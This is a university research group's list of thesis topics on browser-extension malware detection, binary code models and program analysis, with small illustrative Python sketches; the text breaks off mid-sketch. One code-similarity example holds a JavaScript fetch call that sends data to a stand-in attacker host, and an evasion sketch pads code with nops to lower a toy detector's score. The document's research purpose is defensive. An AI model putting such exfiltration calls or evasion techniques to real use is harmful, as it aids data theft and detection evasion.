Chair of Programming Languages and AI

BSc/MSc Theses

This is a (non-exclusive) list of thesis topics currently offered at PLAI. Additionally, other related topics may be available.

Please contact the mentioned person with your transcript of records and highlight all relevant experience related to the topic you are interested in for a BSc or MSc thesis. Also, please take note of the languages the person speaks.

Open

  • MSc
    Malware detection in the CWS using Code Similarity

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    Code similarity measures how closely two pieces of source code resemble each other in structure, syntax, or behavior. It can be analyzed using various techniques, including syntactic (token-based, tree-based), semantic (execution-based, embedding models), and hybrid approaches. Applications include detecting plagiarism, identifying code clones, and clustering similar malware samples.
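    As a minimal illustration of the token-based end of this spectrum, the sketch below compares two JavaScript snippets by the Jaccard similarity of their token 3-gram sets. The tokenizer is a deliberately crude regular expression (an assumption, not a real JavaScript lexer), and non-keyword identifiers are replaced by a placeholder so that simple renaming does not hide a clone.

```python
import re

# Crude tokenizer (an assumption, not a real JavaScript lexer):
# identifiers, integers, simple string literals, single punctuation characters.
TOKEN_RE = re.compile(r"""[A-Za-z_$][\w$]*|\d+|"[^"]*"|'[^']*'|\S""")
KEYWORDS = {"var", "let", "const", "function", "return", "if", "else",
            "for", "while", "new", "this"}


def tokens(src: str) -> list[str]:
    """Tokenize and replace every non-keyword identifier with the placeholder ID."""
    out = []
    for tok in TOKEN_RE.findall(src):
        if tok[0].isalpha() or tok[0] in "_$":
            out.append(tok if tok in KEYWORDS else "ID")
        else:
            out.append(tok)
    return out


def ngrams(toks: list[str], n: int = 3) -> set[tuple[str, ...]]:
    return {tuple(toks[i:i + n]) for i in range(len(toks) - n + 1)}


def jaccard(a: str, b: str, n: int = 3) -> float:
    """|A & B| / |A | B| over the token n-gram sets of two snippets."""
    ga, gb = ngrams(tokens(a), n), ngrams(tokens(b), n)
    if not ga and not gb:
        return 1.0
    return len(ga & gb) / len(ga | gb)


a = 'function f(x) { return fetch("https://evil.example/" + x); }'
b = 'function g(y) { return fetch("https://evil.example/" + y); }'
print(jaccard(a, b))  # 1.0: the snippets differ only in identifier names
```

    Normalizing all identifiers also erases API names such as `fetch`; a real approach would likely keep calls to extension APIs, since they carry much of the malicious signal.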

    Your Part Use recently detected malicious browser extensions as a starting point to find further malware samples. We want a fully automatic approach that can be applied iteratively to this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work Did I Vet You Before? Assessing the Chrome Web Store Vetting Process through Browser Extension Similarity

  • MSc
    Vulnerability Detection in CWS using CodeQL

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    CodeQL is a static analysis tool that models code as a queryable database, allowing users to write custom queries to detect security vulnerabilities and code quality issues. It is widely used for identifying common software weaknesses, such as injection flaws and insecure dependencies, by analyzing source code, dependencies, and data flows. As a vulnerability detector, CodeQL enables security researchers and developers to automate security audits, detect zero-day vulnerabilities, and enforce secure coding practices across large codebases.

    Your Part Use CodeQL to detect security vulnerabilities in Chrome Web Store extensions by analyzing their source code and identifying common weaknesses. The findings will be compared to the current state-of-the-art tools, DoubleX and CoCo, to evaluate CodeQL's effectiveness in detecting malicious or insecure behavior. This comparison will assess detection accuracy, coverage, and false positive rates, providing insights into CodeQL's strengths and limitations for browser extension security analysis.
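    One way to make this comparison concrete is to compute, per tool, precision, recall, and false-positive rate against a manually validated ground truth. The sketch below assumes that each tool's output has already been reduced to a set of flagged extension IDs; the IDs and per-tool sets are placeholders, not real results.

```python
from dataclasses import dataclass


@dataclass
class Scores:
    precision: float
    recall: float
    fpr: float  # false-positive rate = FP / (FP + TN)


def score(flagged: set[str], vulnerable: set[str], universe: set[str]) -> Scores:
    """Compare one tool's flagged extension IDs against a ground-truth set."""
    tp = len(flagged & vulnerable)
    fp = len(flagged - vulnerable)
    fn = len(vulnerable - flagged)
    tn = len(universe - flagged - vulnerable)
    return Scores(
        precision=tp / (tp + fp) if tp + fp else 0.0,
        recall=tp / (tp + fn) if tp + fn else 0.0,
        fpr=fp / (fp + tn) if fp + tn else 0.0,
    )


# Placeholder data, not real results.
universe = {f"ext{i}" for i in range(10)}
vulnerable = {"ext0", "ext1", "ext2"}
reports = {
    "CodeQL": {"ext0", "ext1", "ext5"},
    "DoubleX": {"ext0"},
    "CoCo": {"ext0", "ext1", "ext2", "ext3"},
}
for tool, flagged in reports.items():
    print(tool, score(flagged, vulnerable, universe))
```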

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Knowledge of dataflow analysis.

    Related Work

  • BSc
    Information-theoretic/Statistical Analysis of Explainability in Binary Code Embedding Models

    Application: Please write a short email describing your interests and strengths and attach your transcript of records (incl. bachelor grades). Long walls of text and ChatGPT-generated emails will be ignored without further consideration.

    Motivation

    • Deep learning models have become increasingly popular in the area of binary code analysis
    • Explainable AI (XAI) methods help us understand why DL models produce a given output
    • State-of-the-art models rely on the co-occurrence of assembly instruction tokens

    Your Part

    • Conduct an exploratory data analysis (EDA) on our binary code dataset
    • Analyze relationships and possible correlations between the frequency of specific instructions and their corresponding saliencies ("importance")
    • An information-theoretic analysis would reason about the entropy of specific instructions' occurrence
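    A minimal sketch of both analyses follows. It assumes the dataset has been reduced to (instruction mnemonic, saliency) pairs. It computes the Shannon entropy of the instruction distribution and the Spearman rank correlation between each mnemonic's frequency and its mean saliency. The toy pairs are invented for illustration. On the real dataset, one would more likely use an established statistics library than this hand-rolled version.

```python
import math
from collections import Counter, defaultdict


def shannon_entropy(tokens: list[str]) -> float:
    """Entropy (in bits) of the empirical instruction distribution."""
    counts = Counter(tokens)
    n = len(tokens)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def ranks(xs: list[float]) -> list[float]:
    """1-based ranks; tied values receive the average of their ranks."""
    order = sorted(range(len(xs)), key=lambda i: xs[i])
    r = [0.0] * len(xs)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and xs[order[j + 1]] == xs[order[i]]:
            j += 1
        for k in range(i, j + 1):
            r[order[k]] = (i + j) / 2 + 1
        i = j + 1
    return r


def pearson(x: list[float], y: list[float]) -> float:
    mx, my = sum(x) / len(x), sum(y) / len(y)
    cov = sum((a - mx) * (b - my) for a, b in zip(x, y))
    sx = math.sqrt(sum((a - mx) ** 2 for a in x))
    sy = math.sqrt(sum((b - my) ** 2 for b in y))
    return cov / (sx * sy)  # undefined (division by zero) for constant inputs


def frequency_saliency_correlation(pairs: list[tuple[str, float]]) -> float:
    """Spearman correlation between a mnemonic's frequency and its mean saliency."""
    freq = Counter(m for m, _ in pairs)
    saliencies = defaultdict(list)
    for m, s in pairs:
        saliencies[m].append(s)
    mnemonics = sorted(freq)
    f = [freq[m] for m in mnemonics]
    s = [sum(saliencies[m]) / len(saliencies[m]) for m in mnemonics]
    return pearson(ranks(f), ranks(s))  # Spearman = Pearson on ranks


# Invented toy data: (mnemonic, saliency) pairs.
pairs = [("mov", 0.1), ("mov", 0.2), ("mov", 0.1),
         ("call", 0.9), ("cmp", 0.5), ("cmp", 0.4)]
print(shannon_entropy([m for m, _ in pairs]))
print(frequency_saliency_correlation(pairs))
```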

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Basic knowledge or interest in binary code and/or software security
    • Strong background in statistics/statistical methods and/or background in information theory (entropy)

    Related Work

    • Moritz Dannehl, Samuel Valenzuela, and Johannes Kinder. Which Instructions Matter the Most: A Saliency Analysis of Binary Function Embedding Models. In Proc. IEEE Symp. Security and Privacy Workshops (SPW), Deep Learning Security and Privacy Workshop (DLSP), IEEE, 2025.
  • MSc
    Comparison of Explainability Methods for Deep Learning-Based Binary Code Models

    Motivation

    • Deep learning models have become increasingly popular in the area of binary code analysis
    • However, little work has been done to investigate the behavior of those models
    • Recently, our research group took a first step in this direction and analyzed state-of-the-art models by masking individual instructions in the binary code and determining which instructions impact the models' output the most
    • Many opportunities remain to introduce explainability to this field
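    The masking approach described above can be sketched as occlusion-based saliency. In this approach, one instruction at a time is replaced with a mask token, the function is re-embedded, and the method measures how far the embedding moves (here, by cosine distance). The `embed` function below is a hypothetical stand-in that produces a hashed bag-of-tokens vector. It is not one of the models analyzed in the paper, and the mask token and dimension are arbitrary assumptions.

```python
import hashlib
import math

DIM = 64          # embedding size of the toy model (assumption)
MASK = "<MASK>"   # placeholder token used for occlusion (assumption)


def embed(instructions: list[str]) -> list[float]:
    """Hypothetical stand-in for a binary function embedding model."""
    v = [0.0] * DIM
    for ins in instructions:
        if ins == MASK:
            continue
        h = int(hashlib.sha256(ins.encode()).hexdigest(), 16)
        v[h % DIM] += 1.0
    return v


def cosine(a: list[float], b: list[float]) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb) if na and nb else 0.0


def occlusion_saliency(instructions: list[str]) -> list[float]:
    """Saliency of instruction i = cosine distance after masking instruction i."""
    base = embed(instructions)
    scores = []
    for i in range(len(instructions)):
        masked = instructions[:i] + [MASK] + instructions[i + 1:]
        scores.append(1.0 - cosine(base, embed(masked)))
    return scores


func = ["push rbp", "mov rbp, rsp", "mov eax, 0", "pop rbp", "ret"]
for ins, s in zip(func, occlusion_saliency(func)):
    print(f"{s:.3f}  {ins}")
```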

    Your Part

    • Expand the explainability analyses of the state-of-the-art models by researching, adapting, and applying explainability techniques to an existing dataset of binary functions
    • Conduct exploratory and systematic analyses to compare the results between the explainability techniques and evaluate the suitability of different methods in this domain

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Basic knowledge or interest in binary code and/or software security

    Related Work

    • Moritz Dannehl, Samuel Valenzuela, and Johannes Kinder. Which Instructions Matter the Most: A Saliency Analysis of Binary Function Embedding Models. In Proc. IEEE Symp. Security and Privacy Workshops (SPW), Deep Learning Security and Privacy Workshop (DLSP), IEEE, 2025.
  • MSc
    Building a Cross-Architecture Test Suite for ARM32 Binary Patches
  • MSc
    Replicate results from research done for CWS - Hulk

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Hulk: Eliciting Malicious Behavior in Browser Extensions presents a system that dynamically analyzes Chrome extensions by interacting with them in an instrumented environment to detect malicious behaviors, such as ad injection, credential theft, and code obfuscation. By executing extensions in a controlled setting and monitoring their network activity, DOM modifications, and API calls, Hulk identifies patterns of malicious behavior, uncovering previously undetected malware in the Chrome Web Store. The study highlights the widespread presence of malicious extensions and the challenges in securing browser ecosystems.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Knowledge of fuzzing.

    Related Work Hulk: Eliciting Malicious Behavior in Browser Extensions

  • MSc
    A Study of Data Collection in the CWS

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Detection of Inconsistencies in Privacy Practices of Browser Extensions investigates how browser extensions handle user data and whether their behaviors align with their stated privacy policies. The authors develop an analysis framework to compare declared permissions, privacy policies, and actual data access patterns, uncovering discrepancies that indicate potential privacy violations. Their findings reveal that many extensions request excessive permissions or secretly leak user data, emphasizing the need for stricter enforcement of privacy policies in extension stores.

    Your Part Using the paper as inspiration, we want to study the collection of data types that were not covered in recent research, for example:

    • Personally Identifiable Information (PII)
    • Health Information
    • Financial & Payment Information
    • Authentication Information
    • Personal Communications

    Your experiments will be done in the current state of the Chrome Web Store.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Interest in privacy.

    Related Work Detection of Inconsistencies in Privacy Practices of Browser Extensions

  • MSc
    Replicate results from research done for CWS - You've Changed

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper You've Changed: Detecting Malicious Browser Extensions analyzes how benign Chrome extensions turn malicious after being updated. The authors propose a system that tracks extension updates and detects suspicious changes in permissions, network behavior, and injected scripts. Their findings show that many extensions become harmful post-installation, highlighting the need for stricter vetting and continuous monitoring in browser extension ecosystems.
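    A first, purely static signal for this kind of update tracking is the diff between the manifests of two consecutive versions. The sketch below assumes that both `manifest.json` files have already been extracted. It compares only the permission lists (`permissions`, `optional_permissions`, and `host_permissions` are real Manifest V3 keys). This is far simpler than the system described in the paper, which also considers network behavior and injected scripts.

```python
import json

PERMISSION_KEYS = ("permissions", "optional_permissions", "host_permissions")


def permission_diff(old_manifest: str, new_manifest: str) -> dict[str, dict[str, list[str]]]:
    """Report added/removed entries per permission key between two manifest versions."""
    old, new = json.loads(old_manifest), json.loads(new_manifest)
    diff = {}
    for key in PERMISSION_KEYS:
        before, after = set(old.get(key, [])), set(new.get(key, []))
        if before != after:
            diff[key] = {"added": sorted(after - before), "removed": sorted(before - after)}
    return diff


v1 = '{"manifest_version": 3, "permissions": ["storage"]}'
v2 = ('{"manifest_version": 3, "permissions": ["storage", "cookies"], '
      '"host_permissions": ["<all_urls>"]}')
print(permission_diff(v1, v2))
# {'permissions': {'added': ['cookies'], 'removed': []},
#  'host_permissions': {'added': ['<all_urls>'], 'removed': []}}
```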

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Interest in differential analysis.

    Related Work You’ve Changed: Detecting Malicious Browser Extensions

  • BSc/MSc
    Code Optimizations For Demand-Driven Vulnerability Scanning Of Bytecode

    Motivation Vulnerability scanners often work on an intermediate representation (IR) because source code is either unavailable or too ambiguous, and bytecode is too complex (200+ instructions and an operand stack that must be tracked). To obtain the IR, the tool converts the bytecode into an easy-to-analyze IR and applies classical compiler optimizations during that step. However, an optimized IR is not necessarily the fastest one to analyze, and choosing the right order of optimizations is also non-trivial (the "phase-ordering problem").

    Your Part You will investigate the effects of different optimizations and code structures on the runtime of demand-driven vulnerability scanners. For that, you need to 1) identify (with my help) code structures that benefit demand-driven analyses and then 2) think about how to optimize the code so that these code structures appear more often. Further, we could also look at the problem at a more fundamental level and investigate whether more fine-grained variable lifetimes (cf. non-lexical lifetimes in Rust's IR) increase the performance of the analysis.
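    Classical liveness analysis is one standard way to compute such fine-grained lifetimes. A variable is live at a point only if some later use can still read it, and that point may be well before the end of its lexical scope. The sketch below is a textbook backward fixpoint over a tiny, hypothetical CFG; the node names and the `defs`/`uses` encoding are assumptions. Rust's non-lexical lifetimes are computed differently and in more detail. In the example, `x` is dead on entry to the else-branch node `4`, so a taint fact for `x` could plausibly be dropped there. This is the kind of effect on analysis runtime the topic would measure.

```python
def liveness(cfg, defs, uses):
    """Backward may-analysis: live_in[n] = uses[n] | (live_out[n] - defs[n])."""
    live_in = {n: set() for n in cfg}
    live_out = {n: set() for n in cfg}
    changed = True
    while changed:  # iterate until a fixpoint is reached
        changed = False
        for n in cfg:
            out = set().union(*(live_in[s] for s in cfg[n]))
            inn = uses[n] | (out - defs[n])
            if out != live_out[n] or inn != live_in[n]:
                live_out[n], live_in[n] = out, inn
                changed = True
    return live_in, live_out


# Hypothetical CFG:  1: x = source()   2: if c   3: sink(x)   4: y = 1   5: return
cfg = {"1": ["2"], "2": ["3", "4"], "3": ["5"], "4": ["5"], "5": []}
defs = {"1": {"x"}, "2": set(), "3": set(), "4": {"y"}, "5": set()}
uses = {"1": set(), "2": {"c"}, "3": {"x"}, "4": set(), "5": set()}

live_in, live_out = liveness(cfg, defs, uses)
print(live_in["3"], live_in["4"])  # x is live before node 3 but dead before node 4
```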

    Prerequisites

    • You will have to interact with a large Java codebase and analyze Java applications, therefore being fluent in Java is a requirement
    • Some basic knowledge about compilers or static analysis is beneficial
  • MSc
    Replicate results from research done for CWS - Expector

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Understanding Malvertising Through Ad-Injecting Browser Extensions analyzes ad-injecting browser extensions to understand their ecosystem, revenue models, and impact on users. The authors study a dataset of extensions that modify webpages by injecting ads, revealing how they hijack legitimate traffic, evade detection, and sometimes distribute malware. Their findings highlight the scale of ad injection, its financial incentives, and the security risks posed by such extensions.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to leverage their system for malware detection and validate if their claims still hold in this ecosystem.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Knowledge of malvertising.

    Related Work Understanding Malvertising Through Ad-Injecting Browser Extensions

  • MSc
    Detecting clones in the CWS - Analysis of Imitation Attacks

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The Chrome Web Store contains many extensions that mimic popular ones in name, appearance, and functionality, tricking users into installing them by mistake. These clone extensions often introduce security risks, such as injecting ads, stealing user data, or executing malicious code. The lack of rigorous vetting and automated detection mechanisms allows attackers to exploit user trust and distribute harmful software.

    Your Part Analyze extensions in the Chrome Web Store to identify clones of popular extensions. Develop an approach to detect imitation attempts based on code similarity, metadata, and/or behavior. The solution should scale to continuously monitor and flag potential security risks.
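    As a minimal sketch of the metadata signal, assuming extension names and IDs are already scraped, the function below flags extensions whose name is very similar to a popular extension's name but which have a different ID. It uses `difflib.SequenceMatcher` from the Python standard library. The 0.85 threshold is an arbitrary assumption, and in practice code similarity and behavior would have to complement this signal.

```python
from difflib import SequenceMatcher


def normalize(name: str) -> str:
    """Lower-case and collapse whitespace before comparing names."""
    return " ".join(name.lower().split())


def imitation_candidates(popular, candidates, threshold=0.85):
    """popular/candidates: lists of (extension_id, name). Returns suspicious pairs."""
    hits = []
    for cand_id, cand_name in candidates:
        for pop_id, pop_name in popular:
            if cand_id == pop_id:
                continue  # same extension, not an imitation
            ratio = SequenceMatcher(None, normalize(cand_name), normalize(pop_name)).ratio()
            if ratio >= threshold:
                hits.append((cand_id, pop_id, round(ratio, 3)))
    return hits


popular = [("p1", "uBlock Origin")]
candidates = [("x1", "uBlock 0rigin"), ("x2", "Dark Reader"), ("p1", "uBlock Origin")]
print(imitation_candidates(popular, candidates))
```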

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work What is in the Chrome Web Store? Investigating Security-Noteworthy Browser Extensions

  • BSc
    Replicate results from research done for CWS - CoCo

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation introduces CoCo, a novel framework designed to detect privilege escalation vulnerabilities in browser extensions. By employing coverage-guided, concurrent abstract interpretation, CoCo effectively handles dynamic JavaScript features and scalability challenges, enabling efficient analysis of complex browser extensions. The framework’s efficacy is demonstrated through the detection of over 40 exploitable, manually verified extension vulnerabilities that were previously undetected by other services.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation

  • MSc
    Vulnerability Detection in IoT-Firmware binaries
  • BSc
    Replicate results from research done for CWS - Hardening the Security Analysis

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper Hardening the Security Analysis of Browser Extensions conducts a systematic study of attack entry points within the browser extension ecosystem, identifying both known and novel vulnerabilities such as password theft, traffic interception, and inter-extension attacks. By analyzing the interactions between extensions, browsers, and web applications, the authors propose a comprehensive approach to enhance security analysis, combining static and dynamic methods to detect insecure extensions and, in some cases, synthesize attack payloads. Their evaluation, which involved downloading and examining 133,365 extensions from the Chrome Web Store, underscores the necessity for a more robust threat model to effectively mitigate these security risks.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work Hardening the Security Analysis of Browser Extensions

  • BSc/MSc
    Black Box Evasion Attacks on Binary Code Embedding Models

    Application: Please write a short email describing your interests and strengths and attach your transcript of records (incl. bachelor grades). Long walls of text and ChatGPT-generated emails will be ignored without further consideration.

    Motivation

    • Deep learning models are susceptible to adversarial attacks, i.e., perturbing the input to the model in order to change its output. This is a growing problem, especially in security-related domains, e.g., facial recognition
    • Deep learning models have become increasingly popular in the area of binary code analysis
    • Such models can be used for malware analysis, so attackers have an incentive to evade detection

    Your Part

    • Define the exact adversarial setting and threat model
    • Conduct a literature review of the current state of the art
    • Generate adversarial examples, analyze the model's weaknesses, and/or explore possible hardening/defense techniques
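    To illustrate the black-box setting, the sketch below runs a greedy random search that only queries the model's score. It keeps semantics-preserving perturbations until the score drops below a detection threshold. The perturbation used here is inserting `nop` instructions at random positions. `detector_score` is a hypothetical toy model, not a real binary code model, and the threshold and query budget are assumptions. A realistic attack would need richer transformations.

```python
import random

SUSPICIOUS = {"syscall", "int 0x80", "xor eax, eax"}  # toy feature set (assumption)


def detector_score(instructions: list[str]) -> float:
    """Hypothetical toy detector: share of 'suspicious' instructions."""
    return sum(i in SUSPICIOUS for i in instructions) / len(instructions)


def evade(instructions, threshold=0.2, max_queries=100, seed=0):
    """Greedy black-box search: insert nops while the score does not get worse."""
    rng = random.Random(seed)
    current = list(instructions)
    score = detector_score(current)
    queries = 1
    while score >= threshold and queries < max_queries:
        candidate = list(current)
        candidate.insert(rng.randrange(len(candidate) + 1), "nop")
        cand_score = detector_score(candidate)
        queries += 1
        if cand_score <= score:  # accept non-worsening perturbations
            current, score = candidate, cand_score
    return current, score, queries


prog = ["xor eax, eax", "mov al, 60", "syscall"]
adv, score, queries = evade(prog)
print(f"score {score:.3f} after {queries} queries")
```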

    Prerequisites

    • Excellent academic track record
    • Practical experience using machine learning techniques
    • Strong mathematical background
    • Basic knowledge or interest in binary code and/or software security

    Related Work

    • Capozzi, Gianluca, et al. "Adversarial attacks against binary similarity systems." IEEE Access (2024).
    • Aryal, Kshitiz, et al. "A survey on adversarial attacks for malware analysis." IEEE Access (2024).
  • BSc
    Replicate results from research done for CWS - No Signal Left to Chance

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    The paper No Signal Left to Chance: Driving Browser Extension Analysis by Download Patterns investigates the use of download patterns as a signal for analyzing browser extensions. By leveraging machine learning to cluster extensions based on their download behaviors, the study identifies groups of extensions with similar patterns, some of which are associated with malicious activity. The authors demonstrate that analyzing these patterns can effectively detect malicious extensions, enhancing security measures in browser ecosystems.

    Your Part Repeat the experiments done for the paper in the current state of the Chrome Web Store. We want to validate if their claims still hold in this ecosystem.

    Prerequisites Strong JavaScript and HTML knowledge is required for this topic.

    Related Work No Signal Left to Chance: Driving Browser Extension Analysis by Download Patterns

  • MSc
    A Study on Search Abuse in the CWS

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    In the article "How extensions trick CWS search" on the Almost Secure blog, the author examines how certain browser extensions manipulate the Chrome Web Store's search functionality to gain higher visibility. Developers exploit the multilingual support of CWS by inserting unrelated keywords, including competitors' names, into the descriptions for less commonly used languages. This tactic causes their extensions to appear in search results for terms they would not typically be associated with, leading to misleading and spammy search results.
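    Before applying heavier NLP techniques, a simple baseline for the tactic described above is to check whether each locale's description mentions the names of other extensions. The sketch assumes that localized descriptions are available as a locale-to-text mapping and that a list of competitor names exists. Both the data and the list of names are illustrative.

```python
import re


def stuffed_mentions(descriptions: dict[str, str], own_name: str,
                     other_names: list[str]) -> dict[str, list[str]]:
    """Return, per locale, the other extensions' names that occur in the description."""
    hits = {}
    for locale, text in descriptions.items():
        found = [n for n in other_names
                 if n.lower() != own_name.lower()
                 and re.search(r"\b" + re.escape(n) + r"\b", text, re.IGNORECASE)]
        if found:
            hits[locale] = found
    return hits


descriptions = {
    "en": "Convert web pages to PDF in one click.",
    "sw": "PDF converter AdBlock uBlock Origin Grammarly VPN",
}
print(stuffed_mentions(descriptions, "Simple PDF",
                       ["AdBlock", "uBlock Origin", "Grammarly", "Honey"]))
```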

    Your Part Investigate this kind of abuse in the CWS by leveraging NLP techniques. Your experiments will be done in the current state of the Chrome Web Store.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Interest in NLP.

    Related Work Almost Secure

  • MSc
    Behavior Profiling of Browser Extensions

    Motivation Browser extensions enhance user experience by adding functionality to web browsers, but they also present significant security risks. With access to sensitive data and system resources, extensions can become vectors for malicious activities, such as data theft, privacy invasion, and unauthorized actions. In recent years, the security of browser extensions has become a growing concern due to their increasing prevalence and capability.

    This topic focuses on analyzing updates in Chrome Web Store extensions by applying CodeQL queries to detect behavioral changes. The goal is to automatically identify modifications in network communication, API usage, and data access patterns, highlighting potential security and privacy risks. By systematically comparing extension versions, the analysis aims to provide structured insights into how their behavior evolves over time.

    Your Part

    1. Identify Key Behaviors to Monitor – Create a dataset that highlights the behaviors of interest for tracking updates, such as network requests, data access, and permissions.
    2. Define CodeQL Queries – Develop specific CodeQL queries tailored to detect the behaviors outlined in the dataset.
    3. Generate Reports from Results – Process the query results to generate a detailed report on the identified changes in extension behavior.
    4. Analyze Behavioral Changes Over Time – Investigate how the behavior of extensions evolves through multiple updates, identifying patterns or emerging trends.

    Prerequisites

    • Strong JavaScript and HTML knowledge is required for this topic.
    • Understanding of browser extension functionality.
    • Knowledge of dataflow analysis.

    Related Work Differential Static Analysis for Detecting Malicious Updates to Open Source Packages

  • MSc
    ML-based Transpilation from C to Rust

    Application: Please write an email describing your relevant experiences and attach a CV, your transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • Rust is a modern programming language with strong memory-safety guarantees. However, rewriting existing code bases is too expensive for some companies.
    • We are researching ML-based methods to support automatic translation ("transpilation")

    Your Part

    • Based on Facebook's TransCoder implementation, retrain the model to transpile code snippets from C to Rust, e.g., using datasets such as Rosetta Code
    • Evaluate its performance depending on the size of the input C code and its context

    Prerequisites

    • Basic knowledge in transformer architectures and training
    • Basic knowledge of C and Rust semantics
  • BSc/MSc
    Automatic Modularization of Software Projects for LLM-based Transpilation

    Application: Please write an email describing your relevant experiences and attach a CV, your transcript of records (incl. bachelor grades), and a writing sample

    Motivation

    • With the help of LLMs, more and more tools are being developed for transpiling software from older programming languages to newer ones, e.g., C to Rust transpilation
    • However, most LLM-based research prototypes only operate on code snippets, because the models' context size is too small for whole code bases

    Your Part

    • Given an arbitrary context-size limit of an LLM ($n$ characters), implement an algorithm that splits the code base into small chunks of transpilable code, e.g., by computing a call graph and identifying strongly connected components among the functions in the program.
    • Challenge: How to split the code base into arbitrarily small chunks while ensuring that each chunk still compiles.
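    A minimal sketch of the call-graph idea, under simplifying assumptions, follows. It assumes the call graph and the source size of each function are given. Strongly connected components (mutually recursive functions) are kept together using Tarjan's algorithm. The components are then packed greedily, callees first, into chunks of at most `n` characters. The sketch ignores types, globals, and headers, which is exactly where the compilability challenge lies. An SCC larger than `n` is simply reported as an error.

```python
def tarjan_scc(graph: dict[str, list[str]]) -> list[list[str]]:
    """Tarjan's algorithm; SCCs come out in reverse topological order (callees first)."""
    index, low, on_stack, stack, sccs = {}, {}, set(), [], []
    counter = 0

    def visit(v: str) -> None:
        nonlocal counter
        index[v] = low[v] = counter
        counter += 1
        stack.append(v)
        on_stack.add(v)
        for w in graph.get(v, []):
            if w not in index:
                visit(w)
                low[v] = min(low[v], low[w])
            elif w in on_stack:
                low[v] = min(low[v], index[w])
        if low[v] == index[v]:  # v is the root of an SCC
            scc = []
            while True:
                w = stack.pop()
                on_stack.discard(w)
                scc.append(w)
                if w == v:
                    break
            sccs.append(scc)

    for v in graph:
        if v not in index:
            visit(v)  # recursive; very deep call graphs would need an iterative version
    return sccs


def chunk(graph: dict[str, list[str]], sizes: dict[str, int], n: int) -> list[list[str]]:
    """Greedily pack SCCs (callees before callers) into chunks of at most n characters."""
    chunks, current, used = [], [], 0
    for scc in tarjan_scc(graph):
        size = sum(sizes[f] for f in scc)
        if size > n:
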